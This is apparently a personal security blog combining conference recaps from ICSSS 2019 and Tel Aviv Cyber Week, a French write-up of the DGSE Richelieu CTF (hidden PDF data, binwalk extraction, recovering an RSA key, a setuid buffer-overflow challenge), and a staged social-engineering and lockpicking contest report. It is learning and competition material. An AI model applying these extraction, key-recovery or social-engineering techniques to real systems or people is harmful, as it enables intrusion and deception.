Useful to know about day 6:

The subject tackled in the keynotes of the morning were the following: short briefing on the concept of the Dutch Innovation Factory, Cyber Security activities within an international context. Also, Dr Rutger Leukfeld made a lecture about The Human factor in cybercrime and Peter Janssen presented Cybersprint.

Dutch Innovation Park’s tweet about Day 6

Summary of ICSSS 2019 in pictures

ICSSS 2019 summary in pictures

Why should you attend ICSSS ?

  • ICSSS gives a holistic point of view of cybersecurity. We had ethical hacking workshops and also tackled subjects as various as: laws, policies, cyber resilience, crypto currencies, …
  • Meet people from all over the world (this year 22 different countries). But also a great panel of different backgrounds from technical to legal.
  • The lectures were made by renowned University professors but also by experienced professionals from different fields (private and public sector).
  • Don’t hesitate to apply your motivation will lead you the way! This experience is a once in a lifetime.

To go further

Learning Expeditions in Israel

After having an opportunity to go in Israel for a first learning expedition in 2015, I went back last July (2019). Israel is known to be one of the best startup nation. I am going to share with you my experiences: one in the field computer science and the other in cybersecurity.

SheCodes, Tel Aviv (2015)

SheCodes @ Campus Tel Aviv

The first time I went in Israel I attended one of the SheCodes meetup. They presented the different workshops: from basics of web programming to more advanced programming. In these workshops everyone is welcome no matter which level. You will get to learn by doing and be able to ask questions to other attendes or to the mentors.

If you have the opportunity to attend an event made by SheCodes, you definitely should do it, and if you live in Israel you should attend all of them. Since 2015 they even grew they are not only in Tel Aviv anymore but also in Jerusalem, Herzliya, Netanya, … Click here to get more info on their website.

Technion University (2015)

Technion, Dream it. Do it

During this learning expedition, I scheduled a visit of Technion University. If you want to do the same, you will have to contact them and provide them a short bio and a brief explanation of why you want to visit. Then, they will help you schedule a guided tour of the University.

Technion is among the world top ten science and technology research university. You can read the full history of this University here. Also, by going to Technion you will have the opportunity to visit the breath taking city of Haifa. Why not taking a snack break at Fattoush?

Fattoush restaurant

After this, I chilled out at Bahaï gardens!

View of Bahaïa gardens

BSides Tel Aviv 2019

BSides TLV 2019

Workshop – Ethical Hacking 101 (July 2019)

For the first day of the Cyber Week of Tel Aviv I attended a workshop hosted by BSides Tel Aviv: Ethical Hacking 101 by Telspace Systems.

After a brief introduction on Ethical Hacking, we were able to practice a little. We used different scanners and tools. There were different environments set up just for us to hack them. We got the opportunity to practice SQL injections, vulnerability scanning, vulnerability exploitations. We saw the full process of pentesting, from looking for vulnerabilities to exploiting them with tips and tricks to stay stealthy while doing so. They also presented a very useful tool, really worth mentioning here: CherryTree. With this you can take notes about your process, this will make the pentest report easier to produce in the end.

This class was an awesome introduction to ethical hacking. The instructors were very clear and passionate. If you have the opportunity to attend a BSides meetup you should totally do it.


The day after the workshops, BSides had organized different talks. They were presented by Keren Elazari, Security Analyst, Author and TED Speaker. There was also a special tent for BSides where you could see their partners. There was an area if you were looking for a job and one just to chill out. I need to add a special mention to the decorations of the stage and the posters. They were awesome! You can see the picture below.

Eva Galperin: Where do we go from here, fighting Spouseware and Stalkerware

Eva Galperin is Director of Cybersecurity at the Electronic Frontier Foundation.

The main points in her talks were the following:

  • Stalkerware and Spouseware are not detected by anti-virus
  • She conviced Kaspersky to help with the detection of those apps and take privacey seriously
  • The tools to fight against this exist
  • Laws that already exist need to be enforced
  • She is shouting out for people to talk about this.

If you scroll down you will find in the « To go further » section a link to a video of her talk.

Amichai Shulman and Yuval Ron: Alexa and Cortana in Windowsland

They presented different vulnerabilities they found in Cortana and Alexa on windows operated devices.

In the « To go further section » you will find the youtube Channel of Yuval Ron in which you can find some demos.

Sofia Belikovetsky: The Butterfly Effect Actively manipulating VW through hypervisor introspection

Sofia Belikovetsky took the challenge to create a virtual router in order to find anomalies in the network. In this talk she explained how she proceeded to do this: How she was able to find what was going on in the VMs from the outside (from a list of running processes to a monitor of every new processes).

Tomer Zait and Nimrod Levy: ReDTunnel, Explore Internal Networks via DNS Rebinding Tunnel

Tomer Zait and Nimrod Levy presented ReDTunnel how it works and why they created it. In the « To go further » section you will find a link to ReDTunnel Github, why not contribute?

Yossi Sassi: PowerShell as a Hacking Tool

Yossi Sassi shared many tips to get the best of PowerShell as a hacking tool. In the « To go further » section you can find a link to his slides and… a link to Yossi Sassi & The Oriental Rock Ochestra.

Omri Misgav: Bypassing user-mode hooks 101

Omri Misgav is the team leader of the security research team of Ensilo. In this talk he explained hooking and user-mode hooks.

Yaron King: Low hanging (blue) fruit, Hacking and defending yourself using open-source tools

Yaron King explained how he got confronted to password spraying and what he did about it.

Eyal Itkin: Karta Source code assisted Geographic-based binary matching

Eyal Itkin is a vulnerability researcher at Check Point Research. In this talk he explained how Karta works. In the « To go further » section you can find Karta Source code.

Danny Grander and Yuval Ofir from Pasten CTF Team: Capture the Flag

In their talk Danny Grander and Yuval Ofir explained what a CTF is and their experience with them. They also presented how they resolve hard challenges.

Other events of the Cyberweek 2019 in Tel Aviv

Besides BSides (yeah i know xD ), there were plenty of events during the cyberweek. I went to some of them that i will present here.

Women in Cybersecurity: How to attract more diverse talent

Leading Cyber ladies invited inspiring women in. Firstly, Keren Elazari interviewed some of them. They shared their experience and gave some advices :

  • Hila Meller, VP Security Europe British Telecom. Her advice: if you want it don’t let anyone stop you. Believe in yourself
  • Helen Dixon, Comissioner, DataProtection Comission, Ireland. Her advice: Don’t listen to any advice you are perfect as you are
  • Maria Thompson, Chief Risk Officer State of North Carolina. Her advice: Learn foundations of IT if you are able to achieve and do that you will be more successful.

After those interview Eva Galperin, Director of Cybersecurity and Head of Threat Lab, Electronic Frontier Foundation, presented herself and her career in a brief talk.

Finally, there was a panel moderated by Reut Menashe, co founder of BSides TLV.

Each person from the panel presented their background. Then they shared what and why in their opinion companies should do more to attract more talent.

  • For Limor Kessem, mono culture has a bad effect. She also said that there is an impact on diversity with the « bring a friend policy ». In fact, with this kind of policy companies tend to hire the same kind of people.
  • For Mary McGinley, companies need to have an extremly diverse team to see all aspects of a problem. She reminded the study that said that women won’t apply to a job if they do not fit 100% of the criterias. She advises that even if many people tell you that you should not apply, apply anyway. She added « do something you love and make it work for yourself ».
  • Karine Ben-Simhon, said that it’s important to encourage private and public sector to make equal opportunities. She also said that there is also a problem with women because most of HR staff are women.
  • For Moran Weber, the best way to make a difference is by combining top down and bottom up approach. It’s also important to revise the job description and understand why women don’t apply. In her opinion those descriptions should avoid terms like « ninja code », « superstar », « rockstar », etc. She shared that her best decision was to start putting herself out there and to decide that her imposter syndrom would not decide for her. She used it to help her learn more.

Plenary talk CyberWar is the continuation of politics by other means: interview of Stevan Bernard by Keren Elazari

CyberWar is the continuation of politics by other means

In this interview Stevan Bernard explained how the attack on Sony Pictures of november 2014 was handled. Here are the main points he shared:

  • Never underestimate your enemy.
  • Decisions made on Day 1 are the decisions that saved the company. This day was all about global and big decisions. This is when they decided to call the FBI and cyber security companies.
  • The human link is the weakest link: the attack started with spear phishing.
  • With twelve thousand employees all over the world, in such attack, you need to find alternative ways to communicate: Sony used old blackberry phones.
  • You can’t prepare enough: hire the right people, make the right decisions, get every one on the same page and define roles and responsibilities.

FraudCON 3.0

Stage of FraudCon 3.0

This event was a full day event. All along the day awards for « Legends of fraud fighting » were given and the winners shared their experience. I am going to present some talks of the day.

Limor Kessem, executive security advisor at IBM opened the day. She made an iventory of the last few years in terms of malwares and presented some of them. After her introduction different talks were given.

Ori Wainshtein: Thinking beyond traditional fraud

Ori Wainshtein is Head of Risk Research and Intelligence at Intuit. After a presentation of Intuit, he explained that in his opinion we need to be able to educate our children about this. He presented different aspects of fraud prevention and some scams. To conclude he gave key advices: Invest in customer safety, optimize for brand protection and develop holistic point of view on fraud.

Panel: news from the kingdom

Panel news from the kingdom

In this panel participants shared the lancaspe of UK in terms of fraud. Some figures were presented: reported fraud increased by 6% since 2009. Indentity fraud has been the biggest issue for a while and in 2018 it is more than ever, 85% of it is perpetrated online. They also tackled the issue of fraud detection and how to detect it.

Panel: tales from the colonies

Panel tales from the colonies

In this panel, they started to talk about mobile attacks saying that the minute something is patched, something new is out. Companies have to make things safer without changing too much the customer experience.

Nadav Katzenell: Remote overlay trojans attack and detection

Nadav Katzenell is head of ecurity researcher at IBM Security. In this talk he explained Remote overlay trojan attack. It is an attack that originated in Brazil and then quickly expended in South America and to new industries. Then he explained how his team set up a solution to detect this kind of attack.

Yehonatan Bar-Lev: The power of fusion center

Yehonatan Bar Lev is head of Cyber Center at the Bank Hapoalim. Yehonatan Bar Lev showed us the organization of a drug ring from the inside. What skills they have, how they work, how they hire staff and what type of attack they launch.

Mirko Manske: A sunday in hell

Mirko Manske is a federal criminal police officer in Germany. In this talk he explained how his team and him confronted an internet « provider from hell » to collaborate with them on a special case. He gave us an inside view of how german police and prosecutors work on such cases.

Panel ecommerce fraud, the next generation

Panel ecommerce fraud, the next generation

In this panel, Noa Kind started to explain what Ad Fraud is and how it was countered. Then, other persons from the panel explained how consulting works.

Karisse Hendrix: fighting online fraud is a lot like fighting zombies

Karisse Hendrick is an eCommerce Chargebacks & Fraud Consultant. In this talk she explained how online fraud evolved and her insights as a consultant. She also co-host a podcast that you can find in the « to go further » section.

Spencer McLain: Fighting fraud with collaboration

Spencer McLain is Vice President at Ekata. In this talk he first explained that online sales are increasing in order to tackle the authorization rate and fraud problem. He showed how fraud and solutions to fraud evolved, he gave a holistic approach to fraud prevention.

Sergey Shykevich: Even idiots can do fraud

Sergey Shykevich is cyber threat intelligence team manager at Q6 Cyber. In this talk, Sergey Shykevich explained that even with very basic knowledge anyone could do fraud. To prove his point he even showed an example.

Raymond King: Robbing the digital train

Raymond King is a product manager at TransferWise. In this talk, firstly he presented TransferWise. Then he explained to what kind of fraud TransferWise is confronted and the consequences it has and how they prevented them.

Ethan Ram: Fraudulent App installs

Ethan Ram is VP R&D at ZoomD. In this talk he explains what is App Install Fraud, how it works and how to fight it.

Panel: What’s new in marketplace fraud

Panel: What’s new in marketplace fraud

In this panel, they all shared their insights from their different companies. Firstly they shared the kind of fraud they are confronted to. Then they gave their opinions about machine learning and artificial intelligence to detect fraud. They talked about the collaborations they have with other platforms in the marketplace. Finally they shared some advice to fraud fighting teams.

To hapilly finish the day at FraudCon we did a fun little game in which we had to define if the case presented to us was « friendly fraud » or « true fraud ».


Learning expeditions are a really good way to learn. You get to see different things and discover the world at the same time. The CyberWeek was an awesome experience, i really enjoyed the talks and got to learn a lot. If you have the opportunity to go to the CyberWeek you definitely have to go to BSides TLV and FraudCon.

To go further

Hackeuse pour la DGSE – Challenge Richelieu

Afin d’étoffer ses équipes la DGSE a organisé un challenge: le Challenge Richelieu.

Pour y accéder, il fallait se rendre sur le site :

Page d’accueil du challenge Richelieu

Et c’est tout! A moi ensuite d’enquêter…

Premier réflexe donc, ouvrir la console web et regarder le code source de la page et là j’ai découvert l’existence d’un fichier PDF:

Code source de la page d’accueil du challenge Richelieu

J’accède au fichier en tapant dans le navigateur à la suite de l’adresse « /Richelieu.pdf » pour ainsi obtenir ce qui semblait être un fichier PDF de 364 pages avec un texte noir sur fond blanc à la première page:

Première page du PDF

Mais comme je ne suis pas dupe j’ai fait une sélection de tout le document:

Sélection sur le PDF

Et bien sur du texte était caché. J’ai donc sélectionné tout le texte et collé dans mon notepad préféré.

En voici un extrait:

/9j/2wBDADIiJSwlHzIsKSw4NTI7S31RS0VFS5ltc1p9tZ++u7Kfr6zI4f/zyNT/16yv+v/9//// ////wfD/////////////wgALCA20CD4BAREA/8QAGQABAQEBAQEAAAAAAAAAAAAAAAECAwQF/9oA CAEBAAAAAeFzUWUsiyzUFlgFgChLKud5lms2KluaLBNZs1neNSaRclSxqWLJ0xYVNQFyusxQlA1M 6iyhNRKQrUpCxKuNJqUEqyywmoIosUgmosZ1nSWxYlzbOYEWFlRZQssFlRUAqWGsgsspc6zZUsqW WWagXNlihKCywVZcrLZLYWLEspYssRalJqEmpTQzqCaSNXNualoEUzKQVQlSiklslFRKOUosLIai UlAChFhYohYCoVc6ksAsLLKSyzeNSakWwlsBSyClipKAlSpZpJSrJRFllKVneUpVzVkVFTUsLCFm kmoiyiWS1c0SyWrOVyssoRUsompYAVLBUqxLKlslhZUqUAJqWCWakqWWazpEtgsazrNlhYsti5qw WLBYWWxYljWRZWpWdJrnbc3UzaSqlSasiTSaJYkprNhYaixE1E05AlslRUsUlqFgssBZZZvBYsWL LNZVKjWbYJVkoubFE1JaRYllUSglJSahYm8ypVlCpYGsakVUq5E3Gue7lTNUsubFShYSoWWGoms6 ksKLnTiWSy2EUhZqShQRZrJYUiywssLLCpSW51C53m5KQqVKsWEsosVKXO8zeLLWaWNZ1JZYWVKs lJbnebnSWoE0lzpBQEhbGksAiy3G2dsyqZtzpmiuIssRSWLLYSgWWak1lYsssLLFJUWWGs2LNQJr OoItiW5WazU1BUCWoq5azSaRNSxrIsCxUbzYJrO83OmkY3Cpc6li5usXRLjZmhQICbxTNLqZ1mxL Y1eFgLJUoRbE0lgKgApc2VBUDWSzWVEqFSypbmhNSy5sqazSVrKoFiwtzZWsrKiakpZUVLKudZ1n 

J’ai reconnu un encodage de base64. J’ai ensuite décodé ce texte et testé un « strings » sur le fichier :

Strings sur le fichier décodé
Résultat de la commande

J’ai ainsi obtenu une liste de fichiers et un mot de passe.

Il y a donc des fichiers inclus dans le PDF. Je vous passe mes recherches approfondies sur les structures des PDF (je vous renvoie vers les liens de fin d’article si vous souhaitez en savoir plus, je vous y invite vivement car c’est passionnant).

Il est également intéressant de noter que si l’on renomme le fichier en jpg on obtient une image:

Renommage du fichier en jpg

Répondant maintenant à la question que l’on est amené à se poser, en tout cas que je me suis posée longuement en ce qui me concerne. Comment dois-je faire pour récupérer les fichiers et les extraire? Il existe un outil très pratique pour ceci: binwalk

Résultat de binwalk

Binwalk affiche tous les fichiers que l’on nous avait promis, c’est bon signe! Je vais pouvoir les extraire grâce à l’option -e

Ici mon fichier s’appelle base64.jpg, binwalk va créer un dossier _base64.extracted et y mettre tout ce qu’il aura pu extraire:

Résultat de binwalk -e

Voici le contenu du dossier créé par binwalk:

Résultat du ls dans le dossier créé par binwalk

J’ai ensuite tenté de dézipper le fichier (le mot de passe du zip est celui trouvé précédemment dans le base64:

Mot de passe
Dézippage du fichier et récupération des fichiers

J’ai donc récupéré les fichiers et leur contenus.

Contenu et taille des fichiers que l’on vient d’extraire

Il est important de noter à cette étape qu’en voyant les fichiers obtenus et leur noms, il m’a semblé que j’allais devoir cracker une clé RSA… Je dispose en effet d’une clé publique « public.key » et d’un étrange fichier « prime.txt ».

Je me suis donc attaquée à la compréhension du .bash_history. En connaissant un peu Linux on peut savoir que le .bash_history contient l’historique des commandes tapées. J’ai donc fait un cat sur le fichier pour savoir ce qui a été tapé pour créer les fichiers.

Cat sur le fichier .bash_history

Je remarque plusieurs utilisation de la commande sed qui fonctionne avec des expressions régulières. Une petite recherche m’a permis d’en savoir plus:

The sed General Syntax

Je comprends que prime.txt est une clé RSA mais qu’elle a été modifiée avec la commande sed.

Voici ce qui a été effectué grâce à sed:

// 7f a été remplacé par fb sur tout le document
 1342  sed -i ‘s/7f/fb/g’ prime.txt

// e1 a été remplacé par 66 sur tout le document 
 1343  sed -i ‘s/e1/66/g’ prime.txt

// f4 a été remplacé par 12 sur tout le document
 1344  sed -i ‘s/f4/12/g’ prime.txt

// 16 a été remplacé par 54 sur tout le document
 1345  sed -i ‘s/16/54/g’ prime.txt

// a4 a été remplacé par 57 sur tout le document
 1346  sed -i ‘s/a4/57/g’ prime.txt

// b5 a été remplacé par cd sur tout le document
 1347  sed -i ‘s/b5/cd/g’ prime.txt

Ici il faudrait donc taper les commandes à l’inverse pour retrouver le fichier d’origine.

Je vais maintenant essayer de comprendre en quoi consiste la commande : openssl rsa -noout -text -in priv.key | grep prime1 -A 18 > prime.txt

Grâce à une recherche j’apprend ceci:


Cette commande permet donc juste d’afficher la clé privé.

J’ai eu quelques difficultés sur cette partie du fait de mon manque de connaissances en cryptographie.

J’ai donc fait des recherches afin de continuer car j’étais curieuse de savoir sur quoi cela allait déboucher. J’ai pu trouver le mot de passe pour décompresser

Ce zip contenait un fichier texte avec des informations nécessaires à la continuation du défi.

Il était possible de se connecter en ssh à un serveur dédié au challenge.

Suite du challenge

On passait ensuite sur la partie Wargame du challenge.

Connexion en ssh au wargame richelieu

J’ai un peu joué avec le défi 1 mais j’ai malheureusement manqué de temps pour finir les défis. En manipulant un peu le défi 1, j’ai compris qu’il s’agit d’un buffer overflow à exploiter.

En effet voici le résultat d’un ls -al :

Commande ls -al

Je n’ai évidemment pas les droits nécessaire pour faire un cat sur « drapeau.txt ». Je sais que je peux exécuter le programme grâce aux droits que j’ai a sur prog.bin : -r-sr-sr-x

Je l’ai donc lancé et j’ai pu m’amuser un moment avec les différentes options… Fun fact: avec l’option 3 j’ai vu devant mes yeux ébahis un petit train qui passait sagement:

Petit train express DGSE

Le principe ici était d’exploiter le buffer overflow pour faire des commandes réservées à root. En effet, j’avais noté la présence du « s » sur le programme prog.bin. Ce « s » permet à l’exécutable d’effectuer des commandes que le propriétaire du fichier aurait pu faire. C’est grâce à ceci que j’ai pu en apprendre plus sur la fameuse attaque: « return oriented programming ». En exploitant cette attaque j’aurais pu essayer de faire faire un cat drapeau.txt par le programme.

Note importante: Grâce à Geluchat sur Twitter j’ai appris que la démarche était bien plus simple que ce que j’imaginais pour le défi 1 du wargame:

Voilà donc mon expérience sur le challenge Richelieu. J’ai beaucoup aimé parce-que j’ai appris énormément sur les pdf et j’ai pu découvrir la return oriented programming attack. Je trouve important de noter que même si l’on ne peut pas ou l’on a pas forcément le temps d’aller au bout des défis on apprend énormément même en y conscrant peu de temps.

Je vous invite donc si vous avez l’occasion à faire le prochain défi proposé par la DGSE, qui sait, vous serez peut-être embauchés!

Pour aller plus loin

Compte rendu de la participation de WoSEC Paris au Spying Challenge de LeHack 2019

Scroll down for english version

Teaser du Spying Challenge de LeHack 2019

Dans le cadre des activités du WoSEC Paris, j’ai créé une équipe de CTF pour le Spying Challenge 2019 de la conférence LeHack à Paris.

Logo du Spying Challenge

Qu’est-ce que le Spying Challenge ?

Pour cette troisième édition lors de « leHACK » et dans un contexte d’intelligence économique omniprésent, vous aurez comme mission de collecter des informations sur un ensemble de cibles avec pour but de satisfaire vos clients floués.

Cette mission fera intervenir des recherches en sources ouvertes, du vishing, de la filature, du social engineering, des intrusions physiques, du lockpicking, etc.

Comment ça marche ?

Une première épreuve de qualification avant « leHACK » permettra de départager les meilleures équipes qui pourront continuer l’expérience. C’est dans un second temps, le 6 juillet, que vous serez dans l’action réelle !


Les phases du Spying Challenge

Phase 1: OSINT, GEOINT, Social Engineering et rapport

Les agents Dupont et Martin ont fait appel à des agences dont WoSEC Paris afin d’enquêter sur une entreprise suspecte, voici l’ordre de mission (mail et PDF joint décrivant l’objectif de la mission) :

Présentation des agentes du WoSEC Paris

Christine Granville aka @Gabrielle_BGB

Agente Granville

Ash aka @asdmhx

Agente Ash

Lucy Elizabeth Smith @catr42

Agente Smith

Pour être sélectionnées, il nous fallait réussir cette phase qui consistait à écrire un rapport documenté sur nos démarches telles que de l’OSINT, du GEOINT et du social engineering par téléphone ou par mail/chat.

Extraits du rapport

Voici le rapport que nous avons soumis aux agents Dupont et Martin:

Voici également l’enregistrement de l’appel de l’agent Ash à Lictor (le lien dans le rapport n’est plus valide):

Mail de sélection pour la phase 2

Nous avons été reçues pour passer aux phases suivantes que je vais ici vous décrire.

Phase 2: Le Spying Challenge Physique à LeHack Paris

Avant de commencer cette phase, nous avons reçu un e-mail avec de plus amples informations sur le déroulement de la mission:

Mail de description de la phase 2

Pour décrire la phase je vais présenter chaque mission qui nous ont été confiées tout au long de la journée.

1. Interagir avec le maximum d’interlocuteurs employés par Lictor afin de récupérer de nouvelles informations sur vos cibles.

Equipées de micros, les agentes ont rapidement repéré le stand de Lictor.

  • Ash portait un t-shirt Spartan et a du aborder Liliana (Ingénieure d’affaire chez Lictor) ;
  • Granville s’est fondue dans la salle pour arriver incognito au stand de Lictor et intéragir avec les différents employés ;
  • Smith joue le rôle de la stagiaire en recherche d’un poste stylé et aborda Lictor pour en savoir plus sur leur actions.

2. Identifier et prendre en photo l’employé Jack Barrel

Opération toujours en cours…

3. 11:35 am Rencontre avec le PDG de Lictor

A cette étape de nouvelles missions (en temps limité) nous ont été confiées:

  • Faire du Social Engineering sur le PDG de Lictor afin d’obtenir plus d’informations sur lui (effectué par l’agente Ash) tout en faisant diversion.
  • Récupérer discrètement le sac du PDG afin d’échanger un CD et de prendre un maximum de photo du contenu du sac (effectuée par agente Smith et agente Granville)

4. Neutralisation et fouille

Lors de cet entretien, on nous a confié les missions suivantes:

  • Les employés de Lictor ayant découvert que l’agent Dupont était sous couverture, ils décidèrent de l’éliminer. Pour les stopper, l’agente Smith eu pour mission d’empoisonner le verre de l’employé chargé de la neutralisation de l’agent Dupont.
  • Une salle suspecte certainement équipée de micro devait être fouillée à l’aide d’un détecteur. La salle étant sous surveillance, il fallait que l’agente Ash fasse diversion afin que l’agente Granville puisse entrer pour fouiller la salle et détecter les micros. Des employés surprirent l’agent Granville pendant sa fouille elle a du utiliser ses talents de persuasion pour ne pas éveiller les soupçons.

5. Filature

Lors de cette phase il était question de suivre les employés de Lictor qui avaient kidnappé Gustave Leproleau. Il s’agissait donc de retrouver l’endroit ou était enfermé Gustave. Les agentes ont procédé à différentes filatures et ont identifié la cachette ou était enfermé Gustave Leproleau.

6. Libérer Gustave

Pour la dernière nous devions libérer Gustave. Toutefois, nos plans ne se passèrent pas comme prévu. En effet une horde de sbires cagoulés et tout de noir vêtu nous ont poursuivi et enfermé séparément.

L’agente Ash et l’agente Granville, furent enfermées dans une salle. Menottée, l’agente Granville utilisa sa pince à cheveux pour se libérer. Les mains liées, l’agente Ash réussit à casser le filament de plastique afin d’ouvrir le coffre fort ou étaient dissimulées des informations TOP SECRÈTES.

Pendant ce temps, l’agente Smith subit un interrogatoire musclé qui ne l’impressionna pas du tout.

Les élites de la France selon l’équipe du Spying Challenge

WoSEC Paris: gagnantes du Spying Challenge 2019, LeHack Paris

Nous avons honoré notre mission en libérant Gustave Leproleau des griffes de cette entreprise peu scrupuleuse.

Agente Smith, Gustave Leproleau, Agente Granville, Agente Ash (sous le beau logo WoSEC)

Classement du top 3:

WoSECParis première place!
SpyKidsIH3 deuxième place
Project BlueBird troisième place

Les Rankings successifs de la journée

Ranking OSINT et phase de SE
Ranking phase 2 (SE, document theft, poisoning and surveillance)
Dernier ranking (lockpicking, lie detector, escape)

Tweet du Spying Challenge sur notre victoire

Write-up officiel de l’équipe WoSEC Paris


Merci à @asdmhx et à @catr42 pour leur enthousiasme et leur détermination!

WoSEC Paris remercie l’équipe du Spying Challenge pour l’organisation de ce palpitant challenge et les mise en situation réaliste lors de LeHack.

L’équipe du Spying Challenge

Merci également à tous les participants du Spying Challenge de nous avoir donné du fil à retordre.

Enfin, un grand merci à LeHack d’hoster un tel évènement.

Report on WoSEC Paris’ participation in the Spying Challenge of LeHack 2019

Teaser of Spying Challenge of LeHack 2019

As part of the activities of WoSEC Paris, I created a CTF team for the Spying Challenge 2019 of LeHack conference in Paris.

Logo du Spying Challenge

What is the Spying Challenge?

For this third edition during the “leHACK” and in a context of omnipresent economic intelligence, you will have the mission to collect information on a set of targets with the aim of satisfying your customers.

This mission will involve open source research, vishing, tracking, social engineering, physical intrusions, lockpicking, etc.

How does it work?

A first qualifying event before “leHACK” will allow to decide between the best teams who will be able to continue the experience. It is in a second time, on July 6, that you will be in the real action!


The phases of the Spying Challenge

Phase 1: OSINT, GEOINT, Social Engineering and report

Agents Dupont and Martin called different agencies including WoSEC Paris to investigate a suspicious company, here is the mission order (email and PDF attached describing the objective of the mission):

Presentation of the agents of WoSEC Paris:

Christine Granville aka @Gabrielle_BGB

Agent Granville

Christine Granville, a social engineering enthusiast, is very persuasive. When she was a baby, she hacked the exit code from her mother’s womb. As a child, lockpicking was her favourite extracurricular activity. Today at the WoSEC Paris agency, nothing can resist her, her two favourite sidekicks (Ash and Lucy Elizabeth) and she are in charge of the most dangerous missions.

Ash aka @asdmhx

Agent Ash

Iron fist in a velvet glove, Ash has always known how to distinguish herself by her taste for fighting and high-risk excursions. Her passions in life: knee breaking and videos of axolotl babies. She recently joined the WoSEC Paris team to use her social engineering skills – and also to learn how to pull the worms out of a source without having it end up in an IKEA kit.

Lucy Elizabeth Smith

Agent Smith

Passionate since her early childhood about puzzles, investigations, coded messages and everything that makes knots in the brain, Lucy decided one day to put her talents at the service of the WoSEC Paris agency.

To be selected, we had to succeed in this phase, which consisted in writing a documented report on our approaches such as OSINT, GEOINT and social engineering by phone or email/chat.

Extract of the report

The report is available only in french

Mail for our qualification for phase 2

We had been qualified to move on to the next phases that I will describe here.

Phase 2: The Physical Spying Challenge at LeHack Paris

Before starting this phase, we received an e-mail with more informations about the mission:

Dear agents,

Reading your report convinced us of your ability to
collect relevant information. Your feedback has allowed us to
make great progress in our investigation of Lictor.
As indicated above, we have therefore decided to keep you on
this mission which will continue on July 6, 2019.

Between 10am and 12pm, you should:

  • Interact with as many people as possible employed by Lictor in order to
    retrieve new information about your targets;

  • Identify and take a picture of employee Jack Barrel (he is strong
    suspicious and only shows up at the stand from time to time);

  • Go to the place indicated in attachments at 11:35 a.m.
    (no delays will be tolerated), where you will have to meet the CEO
    of Lictor, and where you will be informed of your orders for the rest of
    the operation.

If possible, bring back a lockpicking kit, enough to take pictures,
write a report in digital format, and your boldness.
We expect a brief report on your new findings to

PS: Do not follow or interact with targets until it is
wears a cap with the Lictor logo on it (according to our information, the
CEO of Lictor and Jack Barrel will not wear hats: you
will still be able to talk to them).
Similarly, you will only be able to interact with Gustave Leproleau if
when he wears his beret.

PPS: The service apologizes for the late hour, there was a pot.


Agents Dupont and Martin

To describe the phase I will present each mission that was given to us throughout the day.

1. Interact with as many people as possible employed by Lictor to retrieve new informations about your targets.

Equipped with microphones, the agents quickly spotted Lictor’s booth.

  • Ash wore a Spartan t-shirt and had to approach Liliana (Business Engineer at Lictor);
  • Granville melted into the room to arrive incognito at the Lictor booth and interact with the different employees ;
  • Smith played the role of an intern in search of a cool position and came to see at Lictor’s stand to know more about their actions.

2. Identify and take a picture of the employee Jack Barrel

Operation still in progress…

3. 11:35 am Meeting with the CEO of Lictor

At this stage we have been entrusted with new missions (in limited time):

  • Social Engineering on the CEO of Lictor to get more information about him (done by Agent Ash) while diverting.
  • Secretly pick up the CEO’s bag to exchange a CD and take as many pictures as possible of the contents of the bag (done by Agent Smith and Agent Granville)

4. Neutralization and search


Congratulations, your mission continues.
Meet us at 3:15 pm in front of the Lictor stand to receive your instructions.

Agents Dupont and Martin

During this interview, we were given the following tasks:

  • When Lictor’s employees discovered that Agent Dupont was undercover, they decided to eliminate him.
    To stop them, Agent Smith was given the task of poisoning the glass of the employee responsible for Agent Dupont’s neutralisation.
  • A suspicious room certainly equipped with microphones had to be searched with a detector. With the room under surveillance, Officer Ash had to create a diversion so that Officer Granville could enter the room to search the room and detect the microphones. Some employees surprised Agent Granville during her search and she had to use her persuasive skills to avoid arousing suspicion.


Phase 3 of your mission is not complete. We will meet at 4:30 pm at Lictor stand for a final spinning event. You will receive your orders on site.

At the end of this test, a selection will be made and only the
the best agents will participate in the final phase.


Agents Dupont and Martin

During this phase, we had to follow Lictor’s employees who had kidnapped Gustave Leproleau. So it was a matter of finding the place where Gustave was locked up. The officers conducted various surveillance operations and identified the hiding place where Gustave Leproleau was locked up.

6. Releasing Gustave

For the last one we had to free Gustave. However, our plans did not go as planned. Indeed a horde of hooded and black-dressed minions chased us and locked us up separately.
Agent Ash and Agent Granville were locked in a room. Handcuffed, Agent Granville used her hair clip to free herself. With her hands tied, Agent Ash managed to break the plastic filament in order to open the safe in which were concealed TOP SECRET information.

Meanwhile, Agent Smith was subjected to a tough interrogation that did not impress her at all.

France’s elites according to the Spying Challenge team

WoSEC Paris: winners of the Spying Challenge 2019, LeHack Paris

We honoured our mission by freeing Gustave Leproleau from the clutches of this unscrupulous company.

Agent Smith, Gustave Leproleau, Agent Granville and Agent Ash (under the beautiful WoSEC logo)

Top 3 ranking

WoSECParis first place!

SpyKidsIH3 second place

Project BlueBird third place

Rankings of the day

OSINT and SE phase ranking

SE, document theft, poisoning and surveillance ranking

Last ranking (lockpicking, lie detector, escape)

Spying challenge tweet about our victory


Thanks to @asdmhx et à @catr42 for their enthusiasm and commitment!

WoSEC Paris thanks the Spying Challenge team for organizing this exciting challenge and the realistic role-playing during LeHack.

L’équipe du Spying Challenge

Thanks also to all the participants of the Spying Challenge for giving us a hard time.

Finally, a big thank you to LeHack for hosting such an event.